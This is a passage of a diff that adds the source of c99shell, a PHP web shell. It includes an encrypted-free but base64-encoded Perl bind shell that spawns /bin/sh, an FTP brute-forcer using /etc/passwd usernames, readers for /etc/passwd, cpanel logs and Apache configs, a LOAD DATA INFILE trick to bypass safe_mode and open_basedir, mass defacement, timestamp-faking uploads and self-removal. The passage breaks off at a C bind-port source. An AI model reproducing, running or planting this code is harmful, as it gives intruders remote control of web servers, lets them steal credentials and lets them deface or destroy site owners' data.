count($onlytabs); + foreach($tabs as $tab) + { + if ((in_array($tab,$onlytabs)) or (!$c)) + { + if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";} + // recieve query for create table structure + $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock); + if (!$res) {$ret[err][] = mysql_error();} + else + { + $row = mysql_fetch_row($res); + $out .= $row[1].";\n\n"; + // recieve table variables + $res = mysql_query("SELECT * FROM `$tab`", $sock); + if (mysql_num_rows($res) > 0) + { + while ($row = mysql_fetch_assoc($res)) + { + $keys = implode("`, `", array_keys($row)); + $values = array_values($row); + foreach($values as $k=>$v) {$values[$k] = addslashes($v);} + $values = implode("', '", $values); + $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; + $out .= $sql; + } + } + } + } + } + $out .= "#---------------------------------------------------------------------------------\n\n"; + if ($file) + { + $fp = fopen($file, "w"); + if (!$fp) {$ret[err][] = 2;} + else + { + fwrite ($fp, $out); + fclose ($fp); + } + } + if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}} + return $ret; +} +} +if (!function_exists("c99fsearch")) +{ +function c99fsearch($d) +{ + global $found; + global $found_d; + global $found_f; + global $a; + if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";} + $handle = opendir($d); + while ($f = readdir($handle)) + { + $true = ($a[name_regexp] and ereg($a[name],$f)) or ((!$a[name_regexp]) and strinstr($a[name],$f)); + if($f != "." && $f != "..") + { + if (is_dir($d.$f)) + { + if (empty($a[text]) and $true) {$found[] = $d.$f; $found_d++;} + c99fsearch($d.$f); + } + else + { + if ($true) + { + if (!empty($a[text])) + { + $r = @file_get_contents($d.$f); + if ($a[text_wwo]) {$a[text] = " ".trim($a[text])." ";} + if (!$a[text_cs]) {$a[text] = strtolower($a[text]); $r = strtolower($r);} + + if ($a[text_regexp]) {$true = ereg($a[text],$r);} + else {$true = strinstr($a[text],$r);} + if ($a[text_not]) + { + if ($true) {$true = false;} + else {$true = true;} + } + if ($true) {$found[] = $d.$f; $found_f++;} + } + else {$found[] = $d.$f; $found_f++;} + } + } + } + } + closedir($handle); +} +} +//Sending headers +header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); +header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT"); +header("Cache-Control: no-store, no-cache, must-revalidate"); +header("Cache-Control: post-check=0, pre-check=0", false); +header("Pragma: no-cache"); + +global $SERVER_SOFTWARE; +if (strtolower(substr(PHP_OS, 0, 3)) == "win") {$win = 1;} +else {$win = 0;} + +if (empty($tmpdir)) +{ + if (!$win) {$tmpdir = "/tmp/";} + else {$tmpdir = $_ENV[SystemRoot];} +} +$tmpdir = str_replace("\\","/",$tmpdir); +if (substr($tmpdir,strlen($tmpdir-1),strlen($tmpdir)) != "/") {$tmpdir .= "/";} +if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") +{ + $safemode = true; + $hsafemode = "ON (secure)"; +} +else {$safemode = false; $hsafemode = "OFF (not secure)";} +$v = @ini_get("open_basedir"); +if ($v or strtolower($v) == "on") +{ + $openbasedir = true; + $hopenbasedir = "".$v.""; +} +else {$openbasedir = false; $hopenbasedir = "OFF (not secure)";} + +$sort = htmlspecialchars($sort); + +$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"PHP/".phpversion()."",$SERVER_SOFTWARE); + +@ini_set("highlight.bg",$highlight_bg); //FFFFFF +@ini_set("highlight.comment",$highlight_comment); //#FF8000 +@ini_set("highlight.default",$highlight_default); //#0000BB +@ini_set("highlight.html",$highlight_html); //#000000 +@ini_set("highlight.keyword",$highlight_keyword); //#007700 +@ini_set("highlight.string","#DD0000"); //#DD0000 + +if ($act != "img") +{ +if (!is_array($actbox)) {$actbox = array();} +$dspact = $act = htmlspecialchars($act); +$disp_fullpath = $ls_arr = $notls = null; +$ud = urlencode($d); +?><? echo $HTTP_HOST; ?> - c99shell +

!C99Shell v. !

Software:  

uname -a:  

 

Safe-mode: 

Directory: "; +foreach($pd as $b) +{ + $t = ""; + reset($e); + $j = 0; + foreach ($e as $r) + { + $t.= $r."/"; + if ($j == $i) {break;} + $j++; + } + echo "".htmlspecialchars($b)."/"; + $i++; +} +echo "   "; +if (is_writable($d)) +{ + $wd = true; + $wdt = "[ ok ]"; + echo "".view_perms(fileperms($d)).""; +} +else +{ + $wd = false; + $wdt = "[ Read-Only ]"; + echo "".view_perms(fileperms($d.$f)).""; +} +$free = diskfreespace(realpath($d)); +$all = disk_total_space(realpath($d)); +$used = $all-$free; +$used_percent = round(100/($all/$free),2); +echo "
Free ".view_size($free)." of ".view_size($all)." (".$used_percent."%)
"; +if (count($quicklaunch) > 0) +{ + foreach($quicklaunch as $item) + { + $item[1] = str_replace("%d",urlencode($d),$item[1]); + $item[1] = str_replace("%upd",urlencode(realpath($d."..")),$item[1]); + echo "".$item[0]."    "; + } +} +$letters = ""; +if ($win) +{ + $abc = array("c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "o", "p", "q", "n", "r", "s", "t", "v", "u", "w", "x", "y", "z"); + $v = explode("\\",$d); + $v = $v[0]; + foreach ($abc as $letter) + { + if (is_dir($letter.":\\")) + { + if ($letter.":" != $v) {$letters .= "[ ".$letter." ] ";} + else {$letters .= "[ ".$letter." ] ";} + } + } + if (!empty($letters)) {echo "
Detected drives: ".$letters;} +} +?>



"; + if (!$sql_sock) {?>
SQL Manager:
"; + if (!$sql_sock) + { + if (!$sql_server) {echo "NO CONNECTION";} + else {echo "
Can't connect
"; echo "".$err."";} + } + else + { + $sqlquicklaunch = array(); + $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"); + if (!$sql_db) {$sqlquicklaunch[] = array("Query","#\" onclick=\"alert('Please, select DB!')");} + else {$sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query");} + $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus"); + $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars"); + $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes"); + $sqlquicklaunch[] = array("Logout",$surl."act=sql"); + + echo "
MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")
"; + + if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}} + echo "
"; + } + echo "
i
  • If login is null, login is owner of process.
  • If host is null, host is localhost
  • If port is null, port is 3306 (default)
    •  Please, fill the form:
    UsernamePassword 
    HOSTPORT
    		">Home
    ".htmlspecialchars($sql_db)." ]---
    "; + $c = 0; + while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM $row[0]"); $count_row = mysql_fetch_array($count); echo "» ".htmlspecialchars($row[0])." (".$count_row[0].")
     +"; mysql_free_result($count); $c++;} + if (!$c) {echo "No tables found in database.";} + } + } + else + { + ?>    		Home
    Please, select database
    		"; + //Start center panel + if ($sql_db) + { + echo "
    There are ".$c." tables in this DB (".htmlspecialchars($sql_db).").
    "; + if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}} + echo "
    "; + + $acts = array("","dump"); + + if ($sql_act == "query") + { + echo "
    "; + if ($submit) + { + if ((!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "Error:
    ".$sql_query_error."
    ";} + } + if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} + if ((!$submit) or ($sql_act)) {echo "
    "; if (($sql_query) and (!$submit)) {echo "Do you really want to :";} else {echo "SQL-Query :";} echo "



     
    ";} + } + if (in_array($sql_act,$acts)) + { + ?>
    Create new table:
     
    		SQL-Dump DB:
    "> 
    ";} + if ($sql_act == "newtpl") + { + echo ""; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!
    "; + } + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".
    Reason: ".mysql_error();} + } + elseif ($sql_act == "dump") + { + $set = array(); + $set["sock"] = $sql_sock; + $set["db"] = $sql_db; + $dump_out = "print"; + if ($dump_out == "print") {$set["print"] = 1; $set["nl2br"] = 1;} + elseif ($dump_out == "download") + { + @ob_clean(); + header("Content-type: c99shell"); + header("Content-disposition: attachment; filename=\"".$f."\";"); + $set["print"] = 1; + $set["nl2br"] = 1; + } + $set["file"] = $dump_file; + $set["add_drop"] = true; + $ret = mysql_dump($set); + if ($dump_out == "download") {exit;} + } + else + { + $result = mysql_query("SHOW TABLE STATUS", $sql_sock) or print(mysql_error()); + echo "
    "; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + $i = 0; + $tsize = $trows = 0; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) + { + $tsize += $row["5"]; + $trows += $row["5"]; + $size = view_size($row["5"]); + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + $i++; + } + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo "
    Table
    		RowsTypeCreatedModifiedSizeAction
     ".$row[0]." ".$row[3]."".$row[1]."".$row[10]."".$row[11]."".$size." +  +
    »
    ".$i." table(s)
    		".$trows."".$row[1]."".$row[10]."".$row[11]."".view_size($tsize)."
     
    "; + mysql_free_result($result); + } + } + } + else + { + $acts = array("","newdb","serverstat","servervars","processes","getfile"); + if (in_array($sql_act,$acts)) + { + ?>
    Create new DB:
     
    		View File:
     
    "; + if ($sql_act == "newdb") + { + echo ""; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!
    ";} + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".
    Reason: ".mysql_error();} + } + if ($sql_act == "serverstatus") + { + $result = mysql_query("SHOW STATUS", $sql_sock); + echo "
    Server-status variables:

    "; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";} + echo "
    Namevalue
    ".$row[0]."".$row[1]."
    "; + mysql_free_result($result); + } + if ($sql_act == "servervars") + { + $result = mysql_query("SHOW VARIABLES", $sql_sock); + echo "
    Server variables:

    "; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";} + echo "
    Namevalue
    ".$row[0]."".$row[1]."
    "; + mysql_free_result($result); + } + if ($sql_act == "processes") + { + if (!empty($kill)) {$query = 'KILL ' . $kill . ';'; $result = mysql_query($query, $sql_sock); echo "Killing process #".$kill."... ok. he is dead, amen.";} + $result = mysql_query("SHOW PROCESSLIST", $sql_sock); + echo "
    Processes:

    "; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "";} + echo "
    IDUSERHOSTDBCOMMANDTIMESTATEINFOAction
    ".$row[0]."".$row[1]."".$row[2]."".$row[3]."".$row[4]."".$row[5]."".$row[6]."".$row[7]."Kill
    "; + mysql_free_result($result); + } + elseif (($sql_act == "getfile")) + { + if (!mysql_create_db("tmp_bd")) {echo mysql_error();} + elseif (!mysql_select_db("tmp_bd")) {echo mysql_error();} + elseif (!mysql_query('CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );')) {echo mysql_error();} + else {mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); $query = "SELECT * FROM tmp_file"; $result = mysql_query($query); if (!$result) {echo "Error in query \"".$query."\": ".mysql_error();} + else + { + for ($i=0;$i$col_value) {$f .= $col_value;}} + if (empty($f)) {echo "File \"".$sql_getfile."\" does not exists or empty!";} + else {echo "File \"".$sql_getfile."\":
    ".nl2br(htmlspecialchars($f));} + } + mysql_free_result($result); + if (!mysql_drop_db("tmp_bd")) {echo ("Can't drop tempory DB \"tmp_bd\"!");} + } + } + } + } + } + echo "
    "; +} +if ($act == "mkdir") +{ + if ($mkdir != $d) {if (file_exists($mkdir)) {echo "Make Dir \"".htmlspecialchars($mkdir)."\": object alredy exists";} elseif (!mkdir($mkdir)) {echo "Make Dir \"".htmlspecialchars($mkdir)."\": access denied";}} + echo "

    "; + $act = $dspact = "ls"; +} +if ($act == "ftpquickbrute") +{ + echo "Ftp Quick brute:
    "; + if ($win) {echo "This functions not work in Windows!

    ";} + else + { + $fp = fopen("/etc/passwd","r"); + if (!$fp) {echo "Can't get /etc/passwd for password-list.";} + else + { + ob_flush(); + $i = $success = 0; + $ftpquick_st = getmicrotime(); + while(!feof($fp)) + { + $str = explode(":",fgets($fp,2048)); + $sock = ftp_connect("localhost",21,1); + if (ftp_login($sock,$str[0],$str[0])) + { + echo "Connected to ".$SERVER_NAME." with login \"".$str[0]."\" and password \"".$str[0]."\".
    "; + ob_flush(); + $success++; + } + if ($i > $nixpwdperpage) {break;} + $i++; + } + if ($success == 0) {echo "No success. connections!";} + $ftpquick_t = round(getmicrotime()-$ftpquick_st,4); + echo "
    Done!
    Total time (secs.): ".$ftpquick_t."
    Total connections: ".$i."
    Success.: ".$success."
    Unsuccess.:".($i-$success)."
    Connects per second: ".round($i/$ftpquick_t,2)."
    "; + } + } +} +if ($act == "lsa") +{ + echo "
    Server security information:
    "; + echo "Software: ".PHP_OS.", ".$SERVER_SOFTWARE."
    "; + echo "Safe-Mode: ".$hsafemode."
    "; + echo "Open base dir: ".$hopenbasedir."
    "; + if (!$win) + { + if ($nixpasswd) + { + if ($nixpasswd == 1) {$nixpasswd = 0;} + $num = $nixpasswd + $nixpwdperpage; + echo "*nix /etc/passwd:
    "; + $i = $nixpasswd; + while ($i < $num) + { + $uid = posix_getpwuid($i); + if ($uid) {echo join(":",$uid)."
    ";} + $i++; + } + } + else {echo "
    Get /etc/passwd
    ";} + if (file_get_contents("/var/cpanel/accounting.log")) {echo "View cpanel logs
    ";} + if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "Apache configuration (httpd.conf)
    ";} + if (file_get_contents("/etc/httpd.conf")) {echo "Apache configuration (httpd.conf)
    ";} + } + else + { + $v = $_SERVER["WINDIR"]."\repair\sam"; + if (file_get_contents($v)) {echo "You can't crack winnt passwords(".$v.")
    ";} + else {echo "You can crack winnt passwords. Download, and use lcp.crack+.
    ";} + } +} +if ($act == "mkfile") +{ + if ($mkfile != $d) + { + if (file_exists($mkfile)) {echo "Make File \"".htmlspecialchars($mkfile)."\": object alredy exists";} + elseif (!fopen($mkfile,"w")) {echo "Make File \"".htmlspecialchars($mkfile)."\": access denied";} + else {$act = "f"; $d = dirname($mkfile); if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";} $f = basename($mkfile);} + } + else {$act = $dspact = "ls";} +} +if ($act == "fsbuff") +{ + $arr_copy = $sess_data["copy"]; + $arr_cut = $sess_data["cut"]; + $arr = array_merge($arr_copy,$arr_cut); + if (count($arr) == 0) {echo "
    Buffer is empty!
    ";} + else + { + echo "File-System buffer

    "; + $ls_arr = $arr; + $disp_fullpath = true; + $act = "ls"; + } +} +if ($act == "selfremove") +{ + if (!empty($submit)) + { + if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; exit; } + else {echo "
    Can't delete ".__FILE__."!
    ";} + } + else + { + $v = array(); + for($i=0;$i<8;$i++) {$v[] = "NO";} + $v[] = "YES"; + shuffle($v); + $v = join("   ",$v); + echo "Self-remove: ".__FILE__."
    Are you sure?
    ".$v."
    "; + } +} +if ($act == "massdeface") +{ + if (empty($deface_in)) {$deface_in = $d;} + if (empty($deface_name)) {$deface_name = "(.*)"; $deface_name_regexp = 1;} + if (empty($deface_text_wwo)) {$deface_text_regexp = 0;} + + if (!empty($submit)) + { + $found = array(); + $found_d = 0; + $found_f = 0; + + $text = $deface_text; + $text_regexp = $deface_text_regexp; + if (empty($text)) {$text = " "; $text_regexp = 1;} + + $a = array + ( + "name"=>$deface_name, "name_regexp"=>$deface_name_regexp, + "text"=>$text, "text_regexp"=>$text_regxp, + "text_wwo"=>$deface_text_wwo, + "text_cs"=>$deface_text_cs, + "text_not"=>$deface_text_not + ); + $defacetime = getmicrotime(); + $in = array_unique(explode(";",$deface_in)); + foreach($in as $v) {c99fsearch($v);} + $defacetime = round(getmicrotime()-$defacetime,4); + if (count($found) == 0) {echo "No files found!";} + else + { + $disp_fullpath = true; + $act = $dspact = "ls"; + if (!$deface_preview) {$actselect = "deface"; $actbox[] = $found; $notls = true;} + else {$ls_arr = $found;} + } + } + else + { + if (empty($deface_preview)) {$deface_preview = 1;} + if (empty($deface_html)) {$deface_html = "

    Mass-defaced with c99shell v. ".$shver.", coded by tristram[CCTeaM].";} + } + echo "
    "; + if (!$submit) {echo "Attention! It's a very dangerous feature, you may lost your data.

    ";} + echo " +Deface for (file/directory name):   - regexp +
    Deface in (explode \";\"): +

    Search text:
    +

    - regexp +   - whole words only +   - case sensitive +   - find files NOT containing the text +
    - PREVIEW AFFECTED FILES +

    Html of deface:
    +

    "; + if ($act == "ls") {echo "
    Deface took ".$defacetime." secs

    ";} +} +if ($act == "search") +{ + if (empty($search_in)) {$search_in = $d;} + if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;} + if (empty($search_text_wwo)) {$search_text_regexp = 0;} + + if (!empty($submit)) + { + $found = array(); + $found_d = 0; + $found_f = 0; + $a = array + ( + "name"=>$search_name, "name_regexp"=>$search_name_regexp, + "text"=>$search_text, "text_regexp"=>$search_text_regxp, + "text_wwo"=>$search_text_wwo, + "text_cs"=>$search_text_cs, + "text_not"=>$search_text_not + ); + $searchtime = getmicrotime(); + $in = array_unique(explode(";",$search_in)); + foreach($in as $v) + { + c99fsearch($v); + } + $searchtime = round(getmicrotime()-$searchtime,4); + if (count($found) == 0) {echo "No files found!";} + else + { + $ls_arr = $found; + $disp_fullpath = true; + $act = $dspact = "ls"; + } + } + echo "
    + +Search for (file/directory name):   - regexp +
    Search in (explode \";\"): +

    Text:
    +

    - regexp +   - whole words only +   - case sensitive +   - find files NOT containing the text +

    "; + if ($act == "ls") {echo "
    Search took ".$searchtime." secs

    ";} +} +if ($act == "upload") +{ + $uploadmess = ""; + $uploadpath = str_replace("\\","/",$uploadpath); + if (empty($uploadpath)) {$uploadpath = $d;} + elseif (substr($uploadpath,strlen($uploadpath)-1,1) != "/") {$uploadpath .= "/";} + if (!empty($submit)) + { + global $HTTP_POST_FILES; + $uploadfile = $HTTP_POST_FILES["uploadfile"]; + if (!empty($uploadfile[tmp_name])) + { + if (empty($uploadfilename)) {$destin = $uploadfile[name];} + else {$destin = $userfilename;} + if (!move_uploaded_file($uploadfile[tmp_name],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile[name]." (can't copy \"".$uploadfile[tmp_name]."\" to \"".$uploadpath.$destin."\"!
    ";} + } + elseif (!empty($uploadurl)) + { + if (!empty($uploadfilename)) {$destin = $uploadfilename;} + else + { + $destin = explode("/",$destin); + $destin = $destin[count($destin)-1]; + if (empty($destin)) + { + $i = 0; + $b = ""; + while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}} + } + if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "Incorect url!
    ";} + else + { + $st = getmicrotime(); + $content = @file_get_contents($uploadurl); + $dt = round(getmicrotime()-$st,4); + if (!$content) {$uploadmess .= "Can't download file!
    ";} + else + { + if ($filestealth) {$stat = stat($uploadpath.$destin);} + $fp = fopen($uploadpath.$destin,"w"); + if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!
    ";} + else + { + fwrite($fp,$content,strlen($content)); + fclose($fp); + if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);} + } + } + } + } + } + if ($miniform) + { + echo "".$uploadmess.""; + $act = "ls"; + } + else + { + echo "File upload:
    ".$uploadmess."
    +Select file on your local computer:
                   or
    +Input URL:

    +Save this file dir:

    +File-name (auto-fill):

    + convert file name to lovercase

    + +
    "; + } +} +if ($act == "delete") +{ + $delerr = ""; + foreach ($actbox as $v) + { + $result = false; + if (empty($v)) {} + $result = fs_rmobj($v); + if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."
    ";} + if (!empty($delerr)) {echo "Deleting with errors:
    ".$delerr;} + } +} +if ($act == "deface") +{ + $deferr = ""; + foreach ($actbox as $v) + { + $result = false; + if (empty($v)) {} + $result = fopen(); + if (!$result) {$deferr .= "Can't delete ".htmlspecialchars($v)."
    ";} + if (!empty($delerr)) {echo "Deleting with errors:
    ".$deferr;} + } +} +if (!$usefsbuff) +{ + if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "
    Sorry, buffer is disabled. For enable, set directive \"USEFSBUFF\" as TRUE.
    ";} +} +else +{ + if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls";} + if ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";} + if ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} $ls_arr = array_merge($sess_data["copy"],$sess_data["cut"]); c99_sess_put($sess_data); $act = "ls";} + + if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);} + elseif ($actpastebuff) + { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!
    ";} + if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!
    ";} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($psterr)) {echo "Pasting with errors:
    ".$psterr;} + } + elseif ($actarcbuff) + { + $arcerr = ""; + if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";} + else {$ext = ".tar.gz";} + + if ($ext == ".tar.gz") + { + $cmdline = "tar cfzv"; + } + $objects = array_merge($sess_data["copy"],$sess_data["cut"]); + foreach($objects as $v) + { + $v = str_replace("\\","/",$v); + if (is_dir($v)) + { + if (substr($v,strlen($v)-1,strlen($v)) != "/") {$v .= "/";} + $v .= "*"; + } + $cmdline .= " ".$v; + } + $ret = `$cmdline`; + if (empty($ret)) {$arcerr .= "Can't call archivator!
    ";} + $ret = str_replace("\r\n","\n"); + $ret = explode("\n",$ret); + if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}} + foreach($sess_data["cut"] as $k=>$v) + { + if (in_array($v,$ret)) {fs_rmobj($v);} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($arcerr)) {echo "Archivation errors:
    ".$arcerr;} + $act = "ls"; + } + elseif ($actpastebuff) + { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!
    ";} + if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!
    ";} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($psterr)) {echo "Pasting with errors:
    ".$psterr;} + } +} +if ($act == "ls") +{ + if (count($ls_arr) > 0) {$list = $ls_arr;} + else + { + $list = array(); + if ($h = @opendir($d)) + { + while ($o = readdir($h)) {$list[] = $d.$o;} + closedir($h); + } + } + if (count($list) == 0) {echo "
    Can't open directory (".htmlspecialchars($d).")!
    ";} + else + { + //Building array + $tab = array(); + $amount = count($ld)+count($lf); + $vd = "f"; //Viewing mode + if ($vd == "f") + { + $row = array(); + $row[] = "Name"; + $row[] = "Size"; + $row[] = "Modify"; + if (!$win) + {$row[] = "Owner/Group";} + $row[] = "Perms"; + $row[] = "Action"; + + $k = $sort[0]; + if ((!is_numeric($k)) or ($k > count($row)-2)) {$k = 0;} + if ($sort[1] == "a") + { + $y = ""; + } + else + { + $y = ""; + } + + $row[$k] .= $y; + for($i=0;$i".$row[$i]."";} + } + + $tab = array(); + $tab[cols] = array($row); + $tab[head] = array(); + $tab[dirs] = array(); + $tab[links] = array(); + $tab[files] = array(); + + foreach ($list as $v) + { + $o = basename($v); + $dir = dirname($v); + + if ($disp_fullpath) {$disppath = $v;} + else {$disppath = $o;} + $disppath = str2mini($disppath,60); + + if (in_array($v,$sess_data["cut"])) {$disppath = "".$disppath."";} + elseif (in_array($v,$sess_data["copy"])) {$disppath = "".$disppath."";} + + $uo = urlencode($o); + $ud = urlencode($dir); + $uv = urlencode($v); + + $row = array(); + + if ($o == ".") + { + $row[] = " ".$o.""; + $row[] = "LINK"; + } + elseif ($o == "..") + { + $row[] = " ".$o.""; + $row[] = "LINK"; + } + elseif (is_dir($v)) + { + if (is_link($v)) {$disppath .= " => ".readlink($v); $type = "LINK";} + else {$type = "DIR";} + $row[] = " [".$disppath."]"; + $row[] = $type; + } + elseif(is_file($v)) + { + $ext = explode(".",$o); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $row[] = " ".$disppath.""; + $row[] = view_size(filesize($v)); + } + $row[] = date("d.m.Y H:i:s",filemtime($v)); + + if (!$win) + { + $ow = @posix_getpwuid(fileowner($v)); + $gr = @posix_getgrgid(filegroup($v)); + $row[] = $ow["name"]."/".$gr["name"]; + } + + if (is_writable($v)) {$row[] = "".view_perms(fileperms($v))."";} + else {$row[] = "".view_perms(fileperms($v))."";} + + if (is_dir($v)) {$row[] = " ";} + else {$row[] = "   ";} + + if (($o == ".") or ($o == "..")) {$tab[head][] = $row;} + elseif (is_link($v)) {$tab[links][] = $row;} + elseif (is_dir($v)) {$tab[dirs][] = $row;} + elseif (is_file($v)) {$tab[files][] = $row;} + } + } + $v = $sort[0]; + function tabsort($a, $b) + { + global $v; + return strnatcasecmp(strip_tags($a[$v]), strip_tags($b[$v])); + } + usort($tab[dirs], "tabsort"); + usort($tab[files], "tabsort"); + if ($sort[1] == "a") + { + $tab[dirs] = array_reverse($tab[dirs]); + $tab[files] = array_reverse($tab[files]); + } + //Compiling table + $table = array_merge($tab[cols],$tab[head],$tab[dirs],$tab[links],$tab[files]); + echo "Listing directory (".count($tab[files])." files and ".(count($tab[dirs])+count($tab[links]))." directories):

    "; + echo ""; + foreach($table as $row) + { + echo "\r\n"; + foreach($row as $v) {echo "\r\n";} + echo "\r\n"; + } + echo "
    ".$v."

    "; + if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) + { + echo "                   "; + } + echo " 

    "; + echo ""; + } +} +if ($act == "bind") +{ + $bndsrcs = array( +"c99sh_bindport.pl"=> +"IyEvdXNyL2Jpbi9wZXJsDQppZiAoQEFSR1YgPCAxKSB7ZXhpdCgxKTt9DQokcG9ydCA9ICRBUkdW". +"WzBdOw0KZXhpdCBpZiBmb3JrOw0KJDAgPSAidXBkYXRlZGIiIC4gIiAiIHgxMDA7DQokU0lHe0NI". +"TER9ID0gJ0lHTk9SRSc7DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsIFBGX0lORVQsIFNPQ0tfU1RS". +"RUFNLCAwKTsNCnNldHNvY2tvcHQoUywgU09MX1NPQ0tFVCwgU09fUkVVU0VBRERSLCAxKTsNCmJp". +"bmQoUywgc29ja2FkZHJfaW4oJHBvcnQsIElOQUREUl9BTlkpKTsNCmxpc3RlbihTLCA1MCk7DQph". +"Y2NlcHQoWCxTKTsNCm9wZW4gU1RESU4sICI8JlgiOw0Kb3BlbiBTVERPVVQsICI+JlgiOw0Kb3Bl". +"biBTVERFUlIsICI+JlgiOw0KZXhlYygiZWNobyBcIldlbGNvbWUgdG8gYzk5c2hlbGwhXHJcblxy". +"XG5cIiIpOw0Kd2hpbGUoMSkNCnsNCiBhY2NlcHQoWCwgUyk7DQogdW5sZXNzKGZvcmspDQogew0K". +"ICBvcGVuIFNURElOLCAiPCZYIjsNCiAgb3BlbiBTVERPVVQsICI+JlgiOw0KICBjbG9zZSBYOw0K". +"ICBleGVjKCIvYmluL3NoIik7DQogfQ0KIGNsb3NlIFg7DQp9", + +"c99sh_bindport.c"=> 